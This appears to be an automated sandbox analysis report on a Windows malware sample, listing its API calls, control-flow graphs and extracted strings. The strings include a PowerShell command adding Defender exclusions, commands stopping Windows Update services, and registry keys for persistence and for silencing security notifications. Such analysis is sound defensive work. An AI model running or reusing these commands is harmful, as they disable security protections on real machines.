                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 291 40e190-40e1b7 socket 292 40e2f1-40e2f5 291->292 293 40e1bd-40e285 htons inet_addr setsockopt call 40b430 bind lstrlenA sendto ioctlsocket 291->293 294 40e2f7-40e2fd 292->294 295 40e2ff-40e305 292->295 298 40e28b-40e292 293->298 294->295 299 40e294-40e2a3 call 40e310 298->299 300 40e2e5-40e2e9 call 40b4f0 298->300 304 40e2a8-40e2b0 299->304 303 40e2ee 300->303 303->292 305 40e2b2 304->305 306 40e2b4-40e2e3 call 40a990 304->306 305->300 306->298
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                                                                              • htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                                                                              • inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                                                                              • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                                                                                • Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                                                                                • Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                                                                                • Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                                                                                • Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                                                                              • bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                                                                              • lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                                                                              • sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                                                                              • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                                                                                • Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                                                                                • Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                                                                                • Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                                                                                • Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                                                                                • Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                              • String ID: 239.255.255.250$X#A
                                                                                                                                                                                              • API String ID: 726339449-2206458040
                                                                                                                                                                                              • Opcode ID: d4aae0188a0692a386eab894faa05248931f68ac7139597ebba67cfde0a765f4
                                                                                                                                                                                              • Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
                                                                                                                                                                                              • Opcode Fuzzy Hash: d4aae0188a0692a386eab894faa05248931f68ac7139597ebba67cfde0a765f4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 359 402020-402032 call 40a740 362 402038-402070 GetSystemInfo InitializeCriticalSection CreateEventA 359->362 363 4021aa-4021ae 359->363 364 402076-402089 CreateIoCompletionPort 362->364 365 40219f-4021a8 call 401600 362->365 364->365 366 40208f-402099 call 40dbb0 364->366 365->363 366->365 371 40209f-4020b7 WSASocketA 366->371 371->365 372 4020bd-402120 setsockopt htons bind 371->372 372->365 373 402126-402138 listen 372->373 373->365 374 40213a-402145 WSACreateEvent 373->374 374->365 375 402147-402157 WSAEventSelect 374->375 375->365 376 402159-40215f 375->376 377 402161-402171 call 40dbe0 376->377 378 40217f-40218f call 40dbe0 376->378 381 402176-40217d 377->381 382 402194-40219e 378->382 381->377 381->378
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                                                                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                                                                                                • Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE
                                                                                                                                                                                              • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                                                                                              • setsockopt.WS2_32 ref: 004020D1
                                                                                                                                                                                              • htons.WS2_32(?), ref: 00402101
                                                                                                                                                                                              • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                                                                                              • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                                                                                              • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                                                                                              • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                                                                                                • Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                                                                                • Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                                                                                • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                                                                                • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                                                                                • Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                                                                                • Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1603358586-0
                                                                                                                                                                                              • Opcode ID: ac805520964283d74d9ea396830670e37537a1ffc2c4ae4913da21a2650ffd4a
                                                                                                                                                                                              • Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
                                                                                                                                                                                              • Opcode Fuzzy Hash: ac805520964283d74d9ea396830670e37537a1ffc2c4ae4913da21a2650ffd4a
                                                                                                                                                                                              • Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                                                                                              • htons.WS2_32(?), ref: 00401508
                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                                                                              • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                                                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
                                                                                                                                                                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
                                                                                                                                                                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4174406920-0
                                                                                                                                                                                              • Opcode ID: c86c4c205b70a7c70dcf50f9a49c850a55a024fca25fb314c9702e9f639428b6
                                                                                                                                                                                              • Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
                                                                                                                                                                                              • Opcode Fuzzy Hash: c86c4c205b70a7c70dcf50f9a49c850a55a024fca25fb314c9702e9f639428b6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040D782
                                                                                                                                                                                              • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
                                                                                                                                                                                              • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040D7F4
                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 0040D814
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040D81A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 107502007-0
                                                                                                                                                                                              • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                              • Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
                                                                                                                                                                                              • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                              • Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                                                                                • Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
                                                                                                                                                                                                • Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D
                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                                                                              • connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                                                                              • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • www.update.microsoft.com, xrefs: 0040B467
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                              • String ID: www.update.microsoft.com
                                                                                                                                                                                              • API String ID: 4063137541-1705189816
                                                                                                                                                                                              • Opcode ID: f159efbcf8a01faa4036468162d002d529369f8e2320b7a0d5a4ce48e9bb38ac
                                                                                                                                                                                              • Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
                                                                                                                                                                                              • Opcode Fuzzy Hash: f159efbcf8a01faa4036468162d002d529369f8e2320b7a0d5a4ce48e9bb38ac
                                                                                                                                                                                              • Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                                                                              • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                                                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
                                                                                                                                                                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
                                                                                                                                                                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3943618503-0
                                                                                                                                                                                              • Opcode ID: 2e22e1ace3e933a50ac164773468cd7a69cd4384e70ac368dc0859233ce66587
                                                                                                                                                                                              • Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e22e1ace3e933a50ac164773468cd7a69cd4384e70ac368dc0859233ce66587
                                                                                                                                                                                              • Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CryptAcquireContextW.ADVAPI32(004083EF,00000000,00000000,00000001,F0000040,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C843
                                                                                                                                                                                              • CryptGenRandom.ADVAPI32(004083EF,?,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C859
                                                                                                                                                                                              • CryptReleaseContext.ADVAPI32(004083EF,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C865
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                                                              • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                              • Instruction ID: f90ee11572ba5f49e3e1a660dc1e1657e7f5db47d76125bfba77a944767198f2
                                                                                                                                                                                              • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E012B5650208FBDB14DFD1EC49FDA776CAB48B01F108554F709E7180DAB5EA4097A8

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 0 407940-407974 Sleep CreateMutexA GetLastError 1 407976-407978 ExitProcess 0->1 2 40797e-407a1d GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 407d31-407d9d Sleep ShellExecuteW * 2 RegOpenKeyExW 2->3 4 407a23-407a2e call 40f1b0 2->4 5 407dcb-407df6 RegOpenKeyExW 3->5 6 407d9f-407dc5 RegSetValueExW RegCloseKey 3->6 13 407a30-407a32 ExitProcess 4->13 14 407a38-407a86 ExpandEnvironmentStringsW wsprintfW CopyFileW 4->14 8 407e24-407e4f RegOpenKeyExW 5->8 9 407df8-407e1e RegSetValueExW RegCloseKey 5->9 6->5 11 407e51-407e77 RegSetValueExW RegCloseKey 8->11 12 407e7d-407ea8 RegOpenKeyExW 8->12 9->8 11->12 17 407ed6-407f01 RegOpenKeyExW 12->17 18 407eaa-407ed0 RegSetValueExW RegCloseKey 12->18 15 407b36-407b78 Sleep wsprintfW CopyFileW 14->15 16 407a8c-407ac6 SetFileAttributesW RegOpenKeyExW 14->16 22 407c28-407c81 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 15->22 23 407b7e-407bb8 SetFileAttributesW RegOpenKeyExW 15->23 16->15 21 407ac8-407afb wcslen RegSetValueExW 16->21 19 407f03-407f29 RegSetValueExW RegCloseKey 17->19 20 407f2f-407f5a RegOpenKeyExW 17->20 18->17 19->20 25 407f88-407fb3 RegOpenKeyExW 20->25 26 407f5c-407f82 RegSetValueExW RegCloseKey 20->26 27 407b29-407b30 RegCloseKey 21->27 28 407afd-407b1f RegCloseKey call 40f400 21->28 22->3 24 407c87-407cc1 SetFileAttributesW RegOpenKeyExW 22->24 23->22 29 407bba-407bed wcslen RegSetValueExW 23->29 24->3 30 407cc3-407cf6 wcslen RegSetValueExW 24->30 32 407fb5-408019 RegSetValueExW * 3 RegCloseKey 25->32 33 40801f-40804a RegOpenKeyExW 25->33 26->25 27->15 28->27 43 407b21-407b23 ExitProcess 28->43 34 407c1b-407c22 RegCloseKey 29->34 35 407bef-407c11 RegCloseKey call 40f400 29->35 36 407d24-407d2b RegCloseKey 30->36 37 407cf8-407d1a RegCloseKey call 40f400 30->37 32->33 39 408050-4080d3 RegSetValueExW * 4 RegCloseKey 33->39 40 4080d9-408104 RegOpenKeyExW 33->40 34->22 35->34 50 407c13-407c15 ExitProcess 35->50 36->3 37->36 51 407d1c-407d1e ExitProcess 37->51 39->40 44 4081f0-40821b RegOpenKeyExW 40->44 45 40810a-4081ea RegSetValueExW * 7 RegCloseKey 40->45 48 408221-408301 RegSetValueExW * 7 RegCloseKey 44->48 49 408307-40831c Sleep call 40d180 44->49 45->44 48->49 54 408491-40849a 49->54 55 408322-40847b WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405c00 call 40e0c0 call 407390 CreateEventA call 40c8b0 call 40dbb0 call 40bc70 call 40dbe0 * 4 call 40dd50 49->55 79 408480-40848e call 40de90 55->79 79->54
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 0040794E
                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,mmn7nnm8na), ref: 0040795D
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00407969
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00407978
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysppvrdnvs.exe,00000105), ref: 004079B2
                                                                                                                                                                                              • PathFindFileNameW.SHLWAPI(C:\Windows\sysppvrdnvs.exe), ref: 004079BD
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004079DA
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 004079EA
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
                                                                                                                                                                                              • wcscmp.NTDLL ref: 00407A13
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00407A32
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                                                                              • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysppvrdnvs.exe$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
                                                                                                                                                                                              • API String ID: 4172876685-1813239017
                                                                                                                                                                                              • Opcode ID: 6c3aa08d7c4c4069ddcf3c5aed638cf34e8cb556e5cf3fb678ad37c5e5b78497
                                                                                                                                                                                              • Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c3aa08d7c4c4069ddcf3c5aed638cf34e8cb556e5cf3fb678ad37c5e5b78497
                                                                                                                                                                                              • Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040F569
                                                                                                                                                                                              • srand.MSVCRT ref: 0040F570
                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
                                                                                                                                                                                              • strlen.NTDLL ref: 0040F59A
                                                                                                                                                                                              • mbstowcs.NTDLL ref: 0040F5B1
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F5B9
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F5CD
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040F5F4
                                                                                                                                                                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040F6F4
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0040F704
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F70F
                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 0040F730
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040F758
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0040F76E
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F77B
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F788
                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040F795
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F7A0
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F7B5
                                                                                                                                                                                              • Sleep.KERNEL32 ref: 0040F7C6
                                                                                                                                                                                              • rand.MSVCRT ref: 0040F7CC
